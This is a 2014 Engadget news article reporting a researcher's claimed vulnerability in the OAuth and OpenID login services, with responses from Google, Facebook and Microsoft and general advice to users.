Latest in Facebook

Image credit:

Popular login services have a security hole, but Facebook and Microsoft can't fix it

Sharif Sakr
May 2, 2014
Share
Tweet
Share

Sponsored Links

The recent Heartbleed scare caused a huge stir, even though it was effectively fixed before it even happened. There are other sorts of security holes, however, which can't be plugged so readily, and which affected companies therefore have less incentive to publicize. A researcher in Singapore, Wang Jing, claims to have uncovered a potentially serious example of this involving the widely-used login services OAuth and OpenID. He says that he's tried to alert major web services that rely on these platforms, including Facebook, Microsoft and Google, but they're refusing to take responsibility for the issue.

If exploited, the vulnerability inside OAuth and OpenID could reportedly allow a malicious website to use a genuine website -- such as Facebook.com -- to authorize its illicit requests for personal information. Any pop-ups shown to the user asking for their approval, would also appear to be coming from the genuine site. According CNET, Google says it's "tracking the issue," Facebook says it's aware of the problem but solving it is "something that can't be accomplished in the short-term," and Microsoft says it can't fix something that "exists on the domain of a third party."

Other security analysts have corroborated Jing's central finding, but some have described it as a "known WONTFIX" or as a fundamental problem with web security as a whole. Either way, the best advice is to be wary of following links that immediately ask you to login to Google or Facebook, and to close the tab if this happens, in order to prevent redirects. As ever, don't just assume that the sites and services you use every day are necessarily safe -- in the future, we could well look back on these years as the Wild West era of the internet.

[Image credit: Gamma Man/Flickr]

All products recommended by Engadget are selected by our editorial team, independent of our parent company. Some of our stories include affiliate links. If you buy something through one of these links, we may earn an affiliate commission.
Comment
Comments
Share
Tweet
Share

Popular on Engadget

California Uber drivers sue company over Prop 22 app notifications

California Uber drivers sue company over Prop 22 app notifications

View
'Uncharted' set photos offer our first look at Tom Holland as Nathan Drake

'Uncharted' set photos offer our first look at Tom Holland as Nathan Drake

View
The Apple TV app is coming to PS4 and PS5

The Apple TV app is coming to PS4 and PS5

View
Jabra's ANC update for the Elite 75t earbuds is now available

Jabra's ANC update for the Elite 75t earbuds is now available

View
Garmin's new smartwatch lets streamers show real-time heart rates

Garmin's new smartwatch lets streamers show real-time heart rates

View

From around the web

Page 1Page 1ear iconeye iconFill 23text filevr